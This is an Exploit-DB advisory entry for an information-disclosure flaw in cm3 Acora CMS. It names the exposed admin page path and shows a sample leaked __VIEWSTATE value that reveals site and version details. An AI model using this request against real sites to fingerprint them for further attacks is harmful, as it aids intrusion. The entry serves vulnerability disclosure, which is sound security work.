cm3 Acora CMS - 'top.aspx' Information Disclosure

EDB-ID:

38740




Platform:

PHP

Date:

2013-08-26


source: https://www.securityfocus.com/bid/62010/info

cm3 Acora CMS is prone to an information-disclosure vulnerability.

Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks. 

http://www.example.com/AcoraCMS/Admin/top.aspx

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div>